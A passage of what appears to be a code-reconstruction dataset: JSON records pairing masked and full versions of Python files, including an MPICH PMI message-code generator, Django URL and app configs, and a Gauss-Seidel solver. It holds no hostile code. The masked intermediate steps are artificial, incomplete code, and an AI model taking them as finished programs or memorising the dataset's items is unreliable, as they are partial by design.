file=Out)\n print(' return pmi_errno;', file=Out)\n print(' fn_fail:', file=Out)\n print(' goto fn_exit;', file=Out)\n elif ret_errno:\n print('', file=Out)\n print(' return pmi_errno;', file=Out)\n print('}', file=Out)\n for NAME in G.cmd_list:\n name = NAME.lower()\n v_list = []\n for v in G.pmi_vers:\n if NAME in v:\n v_list.append(v[NAME])\n v0 = v_list[0]\n if 'query-name' in v0:\n if len(v0['query-attrs']):\n dump_it(NAME, v_list, True, True, v0['query-attrs'])\n dump_it(NAME, v_list, False, True, v0['query-attrs'])\n if 'response-name' in v0:\n if len(v0['response-attrs']):\n dump_it(NAME, v_list, True, False, v0['response-attrs'])\n dump_it(NAME, v_list, False, False, v0['response-attrs'])\n msg_h = 'src/pmi_msg.h'\n msg_c = 'src/pmi_msg.c'\n with open(msg_h, 'w') as Out:\n dump_copyright(Out)\n INC = get_include_guard(msg_h)\n print('#ifndef %s' % INC, file=Out)\n print('#define %s' % INC, file=Out)\n print('', file=Out)\n dump_enums(Out)\n print('', file=Out)\n dump_decls(Out)\n print('', file=Out)\n print('#endif /* %s */' % INC, file=Out)\n with open(msg_c, 'w') as Out:\n dump_copyright(Out)\n for inc in ['pmi_config', 'mpl', 'pmi_util', 'pmi_common',\n 'pmi_wire', 'pmi_msg']:\n print('#include \"%s.h\"\\n' % inc, file=Out)\n dump_cmd_to_id(Out)\n print('', file=Out)\n dump_id_to_str(Out, 'query')\n print('', file=Out)\n dump_id_to_str(Out, 'response')\n print('', file=Out)\n dump_funcs(Out)\n\n\ndef get_set_params(attrs):\n tlist = []\n for a in attrs:\n if len(a) == 3:\n tlist.append(get_kind(a[1]) + get_var(a[0]))\n return ', '.join(tlist)\n\n\ndef get_get_params(attrs):\n tlist = []\n for a in attrs:\n if len(a) == 3:\n tlist.append(get_kind(a[1]) + '*' + get_var(a[0]))\n return ', '.join(tlist)\n\n\ndef get_var(name):\n return name.replace('-', '_')\n\n\ndef get_kind(kind):\n if kind == 'INTEGER':\n return 'int '\n elif kind == 'STRING':\n return 'const char *'\n elif kind == 'BOOLEAN':\n return 'bool '\n else:\n raise Exception('unexpected kind ' + kind)\n\n\n<mask token>\n\n\ndef dump_copyright(out):\n print('/*', file=out)\n print(' * Copyright (C) by Argonne National Laboratory', file=out)\n print(' * See COPYRIGHT in top-level directory', file=out)\n print(' */', file=out)\n print('', file=out)\n print('/* ** This file is auto-generated, do not edit ** */', file=out)\n print('', file=out)\n\n\ndef get_include_guard(h_file):\n h_file = re.sub('.*\\\\/', '', h_file)\n h_file = re.sub('\\\\.', '_', h_file)\n return h_file.upper() + '_INCLUDED'\n\n\n<mask token>\n",
"step-4": "import re\nimport os\n\n\nclass G:\n pmi_vers = []\n cmd_list = []\n cmd_hash = {}\n\n\nclass RE:\n m = None\n\n def match(pat, str, flags=0):\n RE.m = re.match(pat, str, flags)\n return RE.m\n\n def search(pat, str, flags=0):\n RE.m = re.search(pat, str, flags)\n return RE.m\n\n\ndef main():\n load_pmi_txt('maint/pmi-1.1.txt', '1.1')\n load_pmi_txt('maint/pmi-2.0.txt', '2.0')\n dump_all()\n\n\ndef load_pmi_txt(pmi_txt, ver):\n cur_hash = {'version': ver}\n G.pmi_vers.append(cur_hash)\n prev_cmd = None\n cur_cmd = None\n cur_attrs = None\n with open(pmi_txt, 'r') as In:\n for line in In:\n if RE.match('([A-Z]+):', line):\n name = RE.m.group(1)\n cur_cmd = {'version': ver}\n cur_hash[name] = cur_cmd\n if name not in G.cmd_hash:\n G.cmd_list.append(name)\n G.cmd_hash[name] = cur_cmd\n prev_cmd = None\n else:\n prev_cmd = G.cmd_hash[name]\n elif RE.match('\\\\s+([QR]):\\\\s*([\\\\w-]+)(.*)', line):\n QR, cmd, tail = RE.m.group(1, 2, 3)\n cur_attrs = []\n if QR == 'Q':\n cur_cmd['query-name'] = cmd\n if RE.match('.*wire=.+', tail):\n cur_cmd['query-attrs'] = []\n else:\n cur_cmd['query-attrs'] = cur_attrs\n else:\n cur_cmd['response-name'] = cmd\n cur_cmd['response-attrs'] = cur_attrs\n elif RE.match('\\\\s+([\\\\w-]+):\\\\s*([A-Z]+)(.*)', line):\n name, kind, tail = RE.m.group(1, 2, 3)\n cur_attrs.append([name, kind, tail])\n elif RE.match('\\\\s+([\\\\[\\\\]])', line):\n cur_attrs.append(RE.m.group(1))\n\n\ndef dump_all():\n\n def dump_enums(Out):\n print('enum PMIU_CMD_ID {', file=Out)\n print(' PMIU_CMD_INVALID,', file=Out)\n for NAME in G.cmd_list:\n print(' PMIU_CMD_%s,' % NAME, file=Out)\n print('};', file=Out)\n print('', file=Out)\n\n def dump_decls(Out):\n std_query = 'struct PMIU_cmd *pmi_query, int version, bool is_static'\n std_response = (\n 'struct PMIU_cmd *pmi_query, struct PMIU_cmd *pmi_resp, bool is_static'\n )\n std_get = 'struct PMIU_cmd *pmi'\n for NAME in G.cmd_list:\n name = NAME.lower()\n v_list = []\n for v in G.pmi_vers:\n if NAME in v:\n v_list.append(v[NAME])\n v0 = v_list[0]\n decls = []\n if 'query-name' in v0:\n if len(v0['query-attrs']):\n params = get_set_params(v0['query-attrs'])\n decls.append('void PMIU_msg_set_query_%s(%s, %s);' % (\n name, std_query, params))\n params = get_get_params(v0['query-attrs'])\n decls.append('int PMIU_msg_get_query_%s(%s, %s);' % (\n name, std_get, params))\n if 'response-name' in v0:\n if len(v0['response-attrs']):\n params = get_set_params(v0['response-attrs'])\n decls.append('int PMIU_msg_set_response_%s(%s, %s);' %\n (name, std_response, params))\n params = get_get_params(v0['response-attrs'])\n decls.append('int PMIU_msg_get_response_%s(%s, %s);' %\n (name, std_get, params))\n if len(decls):\n print('/* PMIU_CMD_%s */' % NAME, file=Out)\n for l in decls:\n print(l, file=Out)\n\n def dump_cmd_to_id(Out):\n print('int PMIU_msg_cmd_to_id(const char *cmd)', file=Out)\n print('{', file=Out)\n t_if = ' if'\n for NAME in G.cmd_list:\n cmp_list = []\n prev = {}\n for v in G.pmi_vers:\n if NAME in v and 'query-name' in v[NAME]:\n t = v[NAME]['query-name']\n if t not in prev:\n cmp_list.append('strcmp(cmd, \"%s\") == 0' % t)\n prev[t] = 1\n if len(cmp_list):\n print(t_if + ' (' + ' || '.join(cmp_list) + ') {', file=Out)\n print(' return PMIU_CMD_%s;' % NAME, file=Out)\n t_if = ' } else if'\n print(' } else {', file=Out)\n print(' return PMIU_CMD_INVALID;', file=Out)\n print(' }', file=Out)\n print('}', file=Out)\n\n def dump_id_to_str(Out, query):\n namekey = query + '-name'\n print('const char *PMIU_msg_id_to_%s(int version, int cmd_id)' %\n query, file=Out)\n print('{', file=Out)\n print(' switch(cmd_id) {', file=Out)\n for NAME in G.cmd_list:\n cmp_list = []\n prev = {}\n for v in G.pmi_vers:\n if NAME in v and namekey in v[NAME]:\n t = v[NAME][namekey]\n if t not in prev:\n cmp_list.append(t)\n prev[t] = 1\n if len(cmp_list) > 0:\n print(' case PMIU_CMD_%s:' % NAME, file=Out)\n if len(cmp_list) == 1:\n print(' return \"%s\";' % cmp_list[0], file=Out)\n else:\n print(\n ' return (version == PMIU_WIRE_V1) ? \"%s\" : \"%s\";'\n % (cmp_list[0], cmp_list[1]), file=Out)\n print(' default:', file=Out)\n print(' return NULL;', file=Out)\n print(' }', file=Out)\n print('}', file=Out)\n\n def dump_id_to_response(Out):\n print('const char *PMIU_msg_id_to_response(int version, int cmd_id)',\n file=Out)\n print('{', file=Out)\n print(' switch(cmd_id) {', file=Out)\n print(' default:', file=Out)\n print(' return NULL;', file=Out)\n print(' }', file=Out)\n print('}', file=Out)\n\n def dump_funcs(Out):\n std_query = 'struct PMIU_cmd *pmi_query, int version, bool is_static'\n std_response = (\n 'struct PMIU_cmd *pmi_query, struct PMIU_cmd *pmi_resp, bool is_static'\n )\n std_get = 'struct PMIU_cmd *pmi'\n\n def dump_if_version(t_if, version, is_set, is_query):\n if re.match('1\\\\.', version):\n ver = 'PMIU_WIRE_V1'\n else:\n ver = 'PMIU_WIRE_V2'\n if is_set:\n if is_query:\n print(t_if + ' (version == %s) {' % ver, file=Out)\n else:\n print(t_if + ' (pmi_query->version == %s) {' % ver,\n file=Out)\n else:\n print(t_if + ' (pmi->version == %s) {' % ver, file=Out)\n\n def dump_attrs(spaces, is_set, is_query, attrs, attrs0):\n non_optional = 0\n for i in range(len(attrs)):\n a = attrs[i]\n var = get_var(attrs0[i][0])\n if is_query:\n pmi = 'pmi_query'\n else:\n pmi = 'pmi_resp'\n if a[1] == 'INTEGER':\n kind = 'int'\n elif a[1] == 'STRING':\n kind = 'str'\n elif a[1] == 'BOOLEAN':\n kind = 'bool'\n else:\n raise Exception('Unhandled kind: ' + a[1])\n if is_set:\n pmiu = 'PMIU_cmd_add_' + kind\n print(spaces + '%s(%s, \"%s\", %s);' % (pmiu, pmi, a[0],\n var), file=Out)\n elif RE.match('.*optional=(\\\\S+)', a[2]):\n dflt = RE.m.group(1)\n pmiu = 'PMIU_CMD_GET_%sVAL_WITH_DEFAULT' % kind.upper()\n print(spaces + '%s(pmi, \"%s\", *%s, %s);' % (pmiu, a[0],\n var, dflt), file=Out)\n else:\n pmiu = 'PMIU_CMD_GET_%sVAL' % kind.upper()\n print(spaces + '%s(pmi, \"%s\", *%s);' % (pmiu, a[0], var\n ), file=Out)\n non_optional += 1\n return non_optional\n\n def dump_it(NAME, v_list, is_set, is_query, attrs):\n print('', file=Out)\n ret_errno = True\n if is_set:\n params = get_set_params(attrs)\n if is_query:\n ret_errno = False\n print('void PMIU_msg_set_query_%s(%s, %s)' % (name,\n std_query, params), file=Out)\n else:\n print('int PMIU_msg_set_response_%s(%s, %s)' % (name,\n std_response, params), file=Out)\n else:\n params = get_get_params(attrs)\n if is_query:\n print('int PMIU_msg_get_query_%s(%s, %s)' % (name,\n std_get, params), file=Out)\n else:\n print('int PMIU_msg_get_response_%s(%s, %s)' % (name,\n std_get, params), file=Out)\n print('{', file=Out)\n if ret_errno:\n print(' int pmi_errno = PMIU_SUCCESS;', file=Out)\n print('', file=Out)\n if is_set:\n if is_query:\n print(\n ' PMIU_msg_set_query(pmi_query, version, PMIU_CMD_%s, is_static);'\n % NAME, file=Out)\n else:\n print(\n ' PMIU_Assert(pmi_query->cmd_id == PMIU_CMD_%s);' %\n NAME, file=Out)\n print(\n ' pmi_errno = PMIU_msg_set_response(pmi_query, pmi_resp, is_static);'\n , file=Out)\n attrs_b = None\n if len(v_list) > 1:\n if is_query:\n attrs_b = v_list[1]['query-attrs']\n else:\n attrs_b = v_list[1]['response-attrs']\n non_optional = 0\n if attrs_b is None or attrs_identical(attrs, attrs_b):\n non_optional += dump_attrs(' ', is_set, is_query, attrs,\n attrs)\n else:\n dump_if_version(' if', v_list[0]['version'], is_set,\n is_query)\n non_optional += dump_attrs(' ', is_set, is_query,\n attrs, attrs)\n dump_if_version(' } else if', v_list[1]['version'],\n is_set, is_query)\n non_optional += dump_attrs(' ', is_set, is_query,\n attrs_b, attrs)\n if ret_errno:\n print(' } else {', file=Out)\n print(\n ' PMIU_ERR_SETANDJUMP(pmi_errno, PMIU_FAIL, \"invalid version\");'\n , file=Out)\n non_optional += 1\n print(' }', file=Out)\n if non_optional > 0:\n print('', file=Out)\n print(' fn_exit:', file=Out)\n print(' return pmi_errno;', file=Out)\n print(' fn_fail:', file=Out)\n print(' goto fn_exit;', file=Out)\n elif ret_errno:\n print('', file=Out)\n print(' return pmi_errno;', file=Out)\n print('}', file=Out)\n for NAME in G.cmd_list:\n name = NAME.lower()\n v_list = []\n for v in G.pmi_vers:\n if NAME in v:\n v_list.append(v[NAME])\n v0 = v_list[0]\n if 'query-name' in v0:\n if len(v0['query-attrs']):\n dump_it(NAME, v_list, True, True, v0['query-attrs'])\n dump_it(NAME, v_list, False, True, v0['query-attrs'])\n if 'response-name' in v0:\n if len(v0['response-attrs']):\n dump_it(NAME, v_list, True, False, v0['response-attrs'])\n dump_it(NAME, v_list, False, False, v0['response-attrs'])\n msg_h = 'src/pmi_msg.h'\n msg_c = 'src/pmi_msg.c'\n with open(msg_h, 'w') as Out:\n dump_copyright(Out)\n INC = get_include_guard(msg_h)\n print('#ifndef %s' % INC, file=Out)\n print('#define %s' % INC, file=Out)\n print('', file=Out)\n dump_enums(Out)\n print('', file=Out)\n dump_decls(Out)\n print('', file=Out)\n print('#endif /* %s */' % INC, file=Out)\n with open(msg_c, 'w') as Out:\n dump_copyright(Out)\n for inc in ['pmi_config', 'mpl', 'pmi_util', 'pmi_common',\n 'pmi_wire', 'pmi_msg']:\n print('#include \"%s.h\"\\n' % inc, file=Out)\n dump_cmd_to_id(Out)\n print('', file=Out)\n dump_id_to_str(Out, 'query')\n print('', file=Out)\n dump_id_to_str(Out, 'response')\n print('', file=Out)\n dump_funcs(Out)\n\n\ndef get_set_params(attrs):\n tlist = []\n for a in attrs:\n if len(a) == 3:\n tlist.append(get_kind(a[1]) + get_var(a[0]))\n return ', '.join(tlist)\n\n\ndef get_get_params(attrs):\n tlist = []\n for a in attrs:\n if len(a) == 3:\n tlist.append(get_kind(a[1]) + '*' + get_var(a[0]))\n return ', '.join(tlist)\n\n\ndef get_var(name):\n return name.replace('-', '_')\n\n\ndef get_kind(kind):\n if kind == 'INTEGER':\n return 'int '\n elif kind == 'STRING':\n return 'const char *'\n elif kind == 'BOOLEAN':\n return 'bool '\n else:\n raise Exception('unexpected kind ' + kind)\n\n\ndef attrs_identical(attrs_a, attrs_b):\n if len(attrs_a) != len(attrs_b):\n return False\n for i in range(len(attrs_a)):\n a = attrs_a[i]\n b = attrs_b[i]\n if a[0] != b[0] or a[1] != b[1] or a[2] != b[2]:\n return False\n return True\n\n\ndef dump_copyright(out):\n print('/*', file=out)\n print(' * Copyright (C) by Argonne National Laboratory', file=out)\n print(' * See COPYRIGHT in top-level directory', file=out)\n print(' */', file=out)\n print('', file=out)\n print('/* ** This file is auto-generated, do not edit ** */', file=out)\n print('', file=out)\n\n\ndef get_include_guard(h_file):\n h_file = re.sub('.*\\\\/', '', h_file)\n h_file = re.sub('\\\\.', '_', h_file)\n return h_file.upper() + '_INCLUDED'\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "##\n## Copyright (C) by Argonne National Laboratory\n## See COPYRIGHT in top-level directory\n##\n\nimport re\nimport os\n\nclass G:\n pmi_vers = []\n cmd_list = []\n cmd_hash = {}\n\nclass RE:\n m = None\n def match(pat, str, flags=0):\n RE.m = re.match(pat, str, flags)\n return RE.m\n def search(pat, str, flags=0):\n RE.m = re.search(pat, str, flags)\n return RE.m\n\ndef main():\n # run from pmi top_srcdir\n load_pmi_txt(\"maint/pmi-1.1.txt\", \"1.1\")\n load_pmi_txt(\"maint/pmi-2.0.txt\", \"2.0\")\n\n dump_all()\n\ndef load_pmi_txt(pmi_txt, ver):\n cur_hash = {\"version\": ver}\n G.pmi_vers.append(cur_hash)\n\n prev_cmd = None\n cur_cmd = None\n cur_attrs = None\n with open(pmi_txt, \"r\") as In:\n for line in In:\n if RE.match(r'([A-Z]+):', line):\n name = RE.m.group(1)\n cur_cmd = {\"version\": ver} # query-name, query-attrs, response-name, response-attrs\n cur_hash[name] = cur_cmd \n if name not in G.cmd_hash:\n G.cmd_list.append(name)\n G.cmd_hash[name] = cur_cmd\n prev_cmd = None\n else:\n prev_cmd = G.cmd_hash[name]\n elif RE.match(r'\\s+([QR]):\\s*([\\w-]+)(.*)', line):\n QR, cmd, tail = RE.m.group(1, 2, 3)\n cur_attrs = []\n if QR == \"Q\":\n cur_cmd[\"query-name\"] = cmd\n if RE.match(r'.*wire=.+', tail):\n # spawn - we'll manually code it\n cur_cmd[\"query-attrs\"] = []\n else:\n cur_cmd[\"query-attrs\"] = cur_attrs\n else:\n cur_cmd[\"response-name\"] = cmd\n cur_cmd[\"response-attrs\"] = cur_attrs\n elif RE.match(r'\\s+([\\w-]+):\\s*([A-Z]+)(.*)', line):\n name, kind, tail = RE.m.group(1, 2, 3)\n cur_attrs.append([name, kind, tail])\n elif RE.match(r'\\s+([\\[\\]])', line):\n cur_attrs.append(RE.m.group(1))\n\ndef dump_all():\n def dump_enums(Out):\n print(\"enum PMIU_CMD_ID {\", file=Out)\n print(\" PMIU_CMD_INVALID,\", file=Out)\n for NAME in G.cmd_list:\n print(\" PMIU_CMD_%s,\" % NAME, file=Out)\n print(\"};\", file=Out)\n print(\"\", file=Out)\n \n def dump_decls(Out):\n std_query=\"struct PMIU_cmd *pmi_query, int version, bool is_static\"\n std_response=\"struct PMIU_cmd *pmi_query, struct PMIU_cmd *pmi_resp, bool is_static\"\n std_get=\"struct PMIU_cmd *pmi\"\n for NAME in G.cmd_list:\n name = NAME.lower()\n v_list = []\n for v in G.pmi_vers:\n if NAME in v:\n v_list.append(v[NAME])\n v0 = v_list[0]\n decls = []\n if \"query-name\" in v0:\n if len(v0[\"query-attrs\"]):\n params = get_set_params(v0[\"query-attrs\"])\n decls.append(\"void PMIU_msg_set_query_%s(%s, %s);\" % (name, std_query, params))\n params = get_get_params(v0[\"query-attrs\"])\n decls.append(\"int PMIU_msg_get_query_%s(%s, %s);\" % (name, std_get, params))\n if \"response-name\" in v0:\n if len(v0[\"response-attrs\"]):\n params = get_set_params(v0[\"response-attrs\"])\n decls.append(\"int PMIU_msg_set_response_%s(%s, %s);\" % (name, std_response, params))\n params = get_get_params(v0[\"response-attrs\"])\n decls.append(\"int PMIU_msg_get_response_%s(%s, %s);\" % (name, std_get, params))\n if len(decls):\n print(\"/* PMIU_CMD_%s */\" % NAME, file=Out)\n for l in decls:\n print(l, file=Out)\n\n def dump_cmd_to_id(Out):\n print(\"int PMIU_msg_cmd_to_id(const char *cmd)\", file=Out)\n print(\"{\", file=Out)\n t_if = \" if\"\n for NAME in G.cmd_list:\n cmp_list = []\n prev = {}\n for v in G.pmi_vers:\n if NAME in v and \"query-name\" in v[NAME]:\n t = v[NAME][\"query-name\"]\n if t not in prev:\n cmp_list.append(\"strcmp(cmd, \\\"%s\\\") == 0\" % t)\n prev[t] = 1\n if len(cmp_list):\n print(t_if + \" (\" + ' || '.join(cmp_list) + \") {\", file=Out)\n print(\" return PMIU_CMD_%s;\" % NAME, file=Out)\n t_if = \" } else if\"\n print(\" } else {\", file=Out)\n print(\" return PMIU_CMD_INVALID;\", file=Out)\n print(\" }\", file=Out)\n print(\"}\", file=Out)\n\n def dump_id_to_str(Out, query):\n namekey = query + \"-name\"\n print(\"const char *PMIU_msg_id_to_%s(int version, int cmd_id)\" % query, file=Out)\n print(\"{\", file=Out)\n print(\" switch(cmd_id) {\", file=Out)\n for NAME in G.cmd_list:\n cmp_list = []\n prev = {}\n for v in G.pmi_vers:\n if NAME in v and namekey in v[NAME]:\n t = v[NAME][namekey]\n if t not in prev:\n cmp_list.append(t)\n prev[t] = 1\n if len(cmp_list) > 0:\n print(\" case PMIU_CMD_%s:\" % NAME, file=Out)\n if len(cmp_list) == 1:\n print(\" return \\\"%s\\\";\" % cmp_list[0], file=Out)\n else:\n print(\" return (version == PMIU_WIRE_V1) ? \\\"%s\\\" : \\\"%s\\\";\" % (cmp_list[0], cmp_list[1]), file=Out)\n\n print(\" default:\", file=Out)\n print(\" return NULL;\", file=Out)\n print(\" }\", file=Out)\n print(\"}\", file=Out)\n\n def dump_id_to_response(Out):\n print(\"const char *PMIU_msg_id_to_response(int version, int cmd_id)\", file=Out)\n print(\"{\", file=Out)\n print(\" switch(cmd_id) {\", file=Out)\n print(\" default:\", file=Out)\n print(\" return NULL;\", file=Out)\n print(\" }\", file=Out)\n print(\"}\", file=Out)\n\n def dump_funcs(Out):\n std_query=\"struct PMIU_cmd *pmi_query, int version, bool is_static\"\n std_response=\"struct PMIU_cmd *pmi_query, struct PMIU_cmd *pmi_resp, bool is_static\"\n std_get=\"struct PMIU_cmd *pmi\"\n\n def dump_if_version(t_if, version, is_set, is_query):\n if re.match(r\"1\\.\", version):\n ver = \"PMIU_WIRE_V1\"\n else:\n ver = \"PMIU_WIRE_V2\"\n if is_set:\n if is_query:\n print(t_if + \" (version == %s) {\" % ver, file=Out)\n else:\n print(t_if + \" (pmi_query->version == %s) {\" % ver, file=Out)\n else:\n print(t_if + \" (pmi->version == %s) {\" % ver, file=Out)\n\n def dump_attrs(spaces, is_set, is_query, attrs, attrs0):\n non_optional = 0\n for i in range(len(attrs)):\n a = attrs[i]\n var = get_var(attrs0[i][0])\n if is_query:\n pmi = \"pmi_query\"\n else:\n pmi = \"pmi_resp\"\n\n if a[1] == \"INTEGER\":\n kind = \"int\"\n elif a[1] == \"STRING\":\n kind = \"str\"\n elif a[1] == \"BOOLEAN\":\n kind = \"bool\"\n else:\n raise Exception(\"Unhandled kind: \" + a[1])\n\n if is_set:\n pmiu = \"PMIU_cmd_add_\" + kind\n print(spaces + \"%s(%s, \\\"%s\\\", %s);\" % (pmiu, pmi, a[0], var), file=Out)\n else:\n if RE.match(r'.*optional=(\\S+)', a[2]):\n dflt = RE.m.group(1)\n pmiu = \"PMIU_CMD_GET_%sVAL_WITH_DEFAULT\" % kind.upper()\n print(spaces + \"%s(pmi, \\\"%s\\\", *%s, %s);\" % (pmiu, a[0], var, dflt), file=Out)\n else:\n pmiu = \"PMIU_CMD_GET_%sVAL\" % kind.upper()\n print(spaces + \"%s(pmi, \\\"%s\\\", *%s);\" % (pmiu, a[0], var), file=Out)\n non_optional += 1\n return non_optional\n\n def dump_it(NAME, v_list, is_set, is_query, attrs):\n print(\"\", file=Out)\n ret_errno = True\n if is_set:\n params = get_set_params(attrs)\n if is_query:\n ret_errno = False\n print(\"void PMIU_msg_set_query_%s(%s, %s)\" % (name, std_query, params), file=Out)\n else:\n print(\"int PMIU_msg_set_response_%s(%s, %s)\" % (name, std_response, params), file=Out)\n else:\n params = get_get_params(attrs)\n if is_query:\n print(\"int PMIU_msg_get_query_%s(%s, %s)\" % (name, std_get, params), file=Out)\n else:\n print(\"int PMIU_msg_get_response_%s(%s, %s)\" % (name, std_get, params), file=Out)\n print(\"{\", file=Out)\n if ret_errno:\n print(\" int pmi_errno = PMIU_SUCCESS;\", file=Out)\n print(\"\", file=Out)\n\n if is_set:\n if is_query:\n print(\" PMIU_msg_set_query(pmi_query, version, PMIU_CMD_%s, is_static);\" % NAME, file=Out)\n else:\n print(\" PMIU_Assert(pmi_query->cmd_id == PMIU_CMD_%s);\" % NAME, file=Out)\n print(\" pmi_errno = PMIU_msg_set_response(pmi_query, pmi_resp, is_static);\", file=Out)\n attrs_b = None\n if len(v_list) > 1:\n if is_query:\n attrs_b = v_list[1][\"query-attrs\"]\n else:\n attrs_b = v_list[1][\"response-attrs\"]\n\n non_optional = 0\n if attrs_b is None or attrs_identical(attrs, attrs_b):\n non_optional += dump_attrs(\" \", is_set, is_query, attrs, attrs)\n else:\n dump_if_version(\" if\", v_list[0][\"version\"], is_set, is_query)\n non_optional += dump_attrs(\" \", is_set, is_query, attrs, attrs)\n dump_if_version(\" } else if\", v_list[1][\"version\"], is_set, is_query)\n non_optional += dump_attrs(\" \", is_set, is_query, attrs_b, attrs)\n if ret_errno:\n print(\" } else {\", file=Out)\n print(\" PMIU_ERR_SETANDJUMP(pmi_errno, PMIU_FAIL, \\\"invalid version\\\");\", file=Out)\n non_optional += 1\n print(\" }\", file=Out)\n\n if non_optional > 0:\n print(\"\", file=Out)\n print(\" fn_exit:\", file=Out)\n print(\" return pmi_errno;\", file=Out)\n print(\" fn_fail:\", file=Out)\n print(\" goto fn_exit;\", file=Out)\n elif ret_errno:\n print(\"\", file=Out)\n print(\" return pmi_errno;\", file=Out)\n print(\"}\", file=Out)\n\n\n for NAME in G.cmd_list:\n name = NAME.lower()\n v_list = []\n for v in G.pmi_vers:\n if NAME in v:\n v_list.append(v[NAME])\n v0 = v_list[0]\n if \"query-name\" in v0:\n if len(v0[\"query-attrs\"]):\n dump_it(NAME, v_list, True, True, v0[\"query-attrs\"])\n dump_it(NAME, v_list, False, True, v0[\"query-attrs\"])\n if \"response-name\" in v0:\n if len(v0[\"response-attrs\"]):\n dump_it(NAME, v_list, True, False, v0[\"response-attrs\"])\n dump_it(NAME, v_list, False, False, v0[\"response-attrs\"])\n\n # ----------------------\n msg_h = \"src/pmi_msg.h\"\n msg_c = \"src/pmi_msg.c\"\n with open(msg_h, \"w\") as Out:\n dump_copyright(Out)\n INC = get_include_guard(msg_h)\n print(\"#ifndef %s\" % INC, file=Out)\n print(\"#define %s\" % INC, file=Out)\n print(\"\", file=Out)\n dump_enums(Out)\n print(\"\", file=Out)\n dump_decls(Out)\n print(\"\", file=Out)\n print(\"#endif /* %s */\" % INC, file=Out)\n with open(msg_c, \"w\") as Out:\n dump_copyright(Out)\n for inc in [\"pmi_config\", \"mpl\", \"pmi_util\", \"pmi_common\", \"pmi_wire\", \"pmi_msg\"]:\n print(\"#include \\\"%s.h\\\"\\n\" % inc, file=Out)\n dump_cmd_to_id(Out)\n print(\"\", file=Out)\n dump_id_to_str(Out, \"query\")\n print(\"\", file=Out)\n dump_id_to_str(Out, \"response\")\n print(\"\", file=Out)\n dump_funcs(Out)\n\n#---- utils ------------------------------------ \ndef get_set_params(attrs):\n tlist = []\n for a in attrs:\n if len(a) == 3:\n # name, kind, tail\n tlist.append(get_kind(a[1]) + get_var(a[0]))\n return ', '.join(tlist)\n\ndef get_get_params(attrs):\n tlist = []\n for a in attrs:\n if len(a) == 3:\n # name, kind, tail\n tlist.append(get_kind(a[1]) + '*' + get_var(a[0]))\n return ', '.join(tlist)\n\ndef get_var(name):\n return name.replace(\"-\", \"_\")\n\ndef get_kind(kind):\n if kind == \"INTEGER\":\n return \"int \"\n elif kind == \"STRING\":\n return \"const char *\"\n elif kind == \"BOOLEAN\":\n return \"bool \"\n else:\n raise Exception(\"unexpected kind \" + kind)\n\ndef attrs_identical(attrs_a, attrs_b):\n if len(attrs_a) != len(attrs_b):\n return False\n for i in range(len(attrs_a)):\n a = attrs_a[i]\n b = attrs_b[i]\n if a[0] != b[0] or a[1] != b[1] or a[2] != b[2]:\n return False\n return True\n\n# ---- dump utils -----------------------------------------\ndef dump_copyright(out):\n print(\"/*\", file=out)\n print(\" * Copyright (C) by Argonne National Laboratory\", file=out)\n print(\" * See COPYRIGHT in top-level directory\", file=out)\n print(\" */\", file=out)\n print(\"\", file=out)\n print(\"/* ** This file is auto-generated, do not edit ** */\", file=out)\n print(\"\", file=out)\n\ndef get_include_guard(h_file):\n h_file = re.sub(r'.*\\/', '', h_file)\n h_file = re.sub(r'\\.', '_', h_file)\n return h_file.upper() + \"_INCLUDED\"\n\n# ---------------------------------------------------------\nif __name__ == \"__main__\":\n main()\n",
"step-ids": [
10,
13,
15,
18,
19
]
}
|
[
10,
13,
15,
18,
19
] |
from django.urls import path
from .views import PostListView, PostDetailView
urlpatterns = [
path('blog/', PostListView.as_view()),
path('blog/<pk>/', PostDetailView.as_view()),
]
|
normal
|
{
"blob_id": "be7fb94c3c423b67aa917a34328acda5926cf78a",
"index": 3133,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nurlpatterns = [path('blog/', PostListView.as_view()), path('blog/<pk>/',\n PostDetailView.as_view())]\n",
"step-3": "from django.urls import path\nfrom .views import PostListView, PostDetailView\nurlpatterns = [path('blog/', PostListView.as_view()), path('blog/<pk>/',\n PostDetailView.as_view())]\n",
"step-4": "from django.urls import path\nfrom .views import PostListView, PostDetailView\n\nurlpatterns = [\n path('blog/', PostListView.as_view()),\n path('blog/<pk>/', PostDetailView.as_view()),\n]",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
from django.apps import AppConfig
class StonewallConfig(AppConfig):
name = 'stonewall'
|
normal
|
{
"blob_id": "8364264851895ccabeb74fd3fab1d4f39da717f8",
"index": 8398,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass StonewallConfig(AppConfig):\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass StonewallConfig(AppConfig):\n name = 'stonewall'\n",
"step-4": "from django.apps import AppConfig\n\n\nclass StonewallConfig(AppConfig):\n name = 'stonewall'\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
# -*- coding: utf-8 -*-
import numpy as np
def gauss_seidel(relax, est, stop):
"""
Método iterativo de Gauss-Seidel para o sistema linear do trabalho.
Onde relax é o fator de relaxação, est é o valor inicial, stop é o
critério de parada, n é a quantidade de linhas do sistema e k é o
número de iterações.
"""
k = 0
dif = 10000
n = len(est)
diff = np.zeros(n)
while dif > stop:
k += 1
est[0] = ((1 - relax) * est[0]) + relax * (1.50 - est[1])
for i in range(1, int(n/2)):
est[i] = ((1 - relax) * est[i]) + relax * \
((1.0 - est[i-1] - est[i+1] - est[i+25])/4)
for j in range(int(n/2), n-1):
est[j] = ((1 - relax) * est[j]) + relax * \
((2.0 - est[j-25] - est[j-1] - est[j+1])/5)
est[n-1] = ((1 - relax) * est[n-1]) + relax * (3.00 - est[n-2])
dif = max(abs(np.subtract(est, diff)))
diff = np.copy(est)
return [est, k]
|
normal
|
{
"blob_id": "51540a80c7b29dc0bbb6342ee45008108d54b6f2",
"index": 714,
"step-1": "<mask token>\n",
